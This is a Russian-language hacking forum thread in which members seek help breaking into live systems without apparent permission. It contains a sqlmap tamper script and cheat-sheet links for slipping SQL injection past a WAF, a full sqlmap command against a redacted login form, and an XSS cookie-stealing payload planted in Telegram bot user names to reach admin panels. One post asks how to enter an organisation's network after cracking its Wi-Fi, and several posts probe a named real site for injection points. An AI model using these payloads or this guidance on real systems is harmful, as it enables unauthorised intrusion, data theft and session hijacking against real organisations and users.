Руками надо смотреть на что ругается ВАФ и потом уже искать обход. Почитай и попробуй варианты https://hydrasky.com/network-security/sql-injection-bypass-cheatsheet/ http://www.securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
Прошу помощи в раскрутке скули Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф Ругается на слово union, select пропускает Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше Ошибка вафа : You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator. Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь
Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример Spoiler #!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): pass def tamper(payload, **kwargs): """ ........ """ if payload: payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/") payload = payload.replace("table_schema", "/*!12345%74able_schema*/") payload = payload.replace("table_name", "/*!12345%74able_name*/") payload = payload.replace("UNION", "/*!12345%75NION*/") payload = payload.replace("SELECT", "/*!12345%73ELECT*/") payload = payload.replace("SCHEMA", "%73CHEMA") payload = payload.replace("schema", "%73chema") payload = payload.replace("from", "/*!12345from*/") return payload дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"
Да, это все я понимаю, дело в том, что я руками не могу, все варианты провалились, это MSSQL как оказалось С которым у меня не так много опыта, буду благодарен за любую помощь
Всем доброго вечера! Подскажите, подобрал пароль к wi-fi роутеру организации, видно локальную сеть из 5 устройств и одного принтера. Компы на винде 7. Есть ли возможность проникнуть в расшаренные папки? ибо при попытке захода на удаленный комп внутри ЛВС требуется пароль и логин. Пароль требует только к компу админа, а остальные компы видны только как медиапроигрыватели
sqlmap.py -u "https://******/client/login" -p "email" --risk="3" --level="3" --method="POST" --data="--3e306551ffbd4492975ea8cd2a9917cc Content-Disposition: form-data; name=%22email%22 test --3e306551ffbd4492975ea8cd2a9917cc Content-Disposition: form-data; name=%22password%22 N3tsp@rker- --3e306551ffbd4492975ea8cd2a9917cc Content-Disposition: form-data; name=%22action%22 login --3e306551ffbd4492975ea8cd2a9917cc Content-Disposition: form-data; name=%22submit%22 Sign In --3e306551ffbd4492975ea8cd2a9917cc Content-Disposition: form-data; name=%22hash%22 3a4bf5ec9dcc971c08509bf8f5ca5cf1daac489a --3e306551ffbd4492975ea8cd2a9917cc-- " --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" --headers="Accept:application/json, text/javascript, */*; q=0.01\nContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryOln7Ytw9vsNImdiP\nOrigin:https://*****\nX-Requested-With:XMLHttpRequest\nReferer:https://****/terms" --dbms="MySQL" --batch Подскажите как это всё в мапу упаковать?Сама мапа не находит уяз на сайте,пришлось спаркером воспользоваться,команда выдает то,что выше,но мапа так это не хавает
Вот скажите, является ли уязвимостью тот факт, что в телеграм БОТах с админками вполне сносно работает XSS если указывать банальный код в имя-фамилию пользователя. Большая часть админок, не фильтрует эти данные и выходит, что можно просто написать Имя: <script>alert(document.cookie)</script> Зайти в бота, и в админке вуаля Бага это сервиса или разработчиков, которых даже не предупреждают о таких "возможностях" ?)
Да, является, с толковым подходом тут много что можно реализовать, на примере того же BEEF https://cryptoworld.su/beef-framework/, также в зависимости от того, как устроена/прописана админка, возможно воздействовать на функционал, опять же на примере XSS to RCE в wordpress или прочих CMS
Печально обстоят дела с телегой... Ну вот что им стоит поднять задницу и профиксить это на выводе к ботам напр? А так, ходи, тр***й всех вокруг - им пофиг.
POST draw=4&columns[0][data]= ' &columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=Smith&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=3&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=Smith&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=3&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=Smith&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=3&columns[4][search][regex]=false&start=3&length=25&search[value]=3&search[regex]=false A Database Error Occurred Error Number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100' at line 4 SELECT `email`, `date` FROM `login` WHERE `referral` = '[email protected]' AND ( LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100 Filename: libraries/Datatables.php Line Number: 354 крутиться вообще никак не хочет может кто подскажет что sqlmap тоже не берёт
вижу 2 колонки, а остальное не понятно. columns[0][data]= ' я так понял тут инжектите? А до ваших манипуляций там какие были данные? Если `date` это columns[0][data] тогда у вас иньекция в начале запроса: Code: SELECT `email`, `ТУТ_СКУЛЯ` FROM `login` WHERE `referral` = '[email protected]' AND ( LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100 в таком случае вам нужно чтоб не нарушать запрос вывести 2 колонки и отбросить остальное комментарием кода. Либо внедрить свой код так чтоб не нарушить оставшийся запрос, по типу: columns[0][data]=(select version()) а еще не понятно почему ругается на LIKE и почему там нет AND если инжект в реферале.
Да не хотит крутится сайт https:/_/naira2usd.com/myreferralsx POST draw=6&columns[0][data]='&columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&start=3&length=100&search[value]=3&search[regex]=false может у кого получится
Не хотит наверное потому что там ее нету скорее всего, ну я покрайнемере ничего необычного не увидел)) В другом месте потенциальная есть Code: https://naira2usd.com/confirmx POST draw=2&columns[0][data]=&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&start=0&length=100&search[value]='&search[regex]=false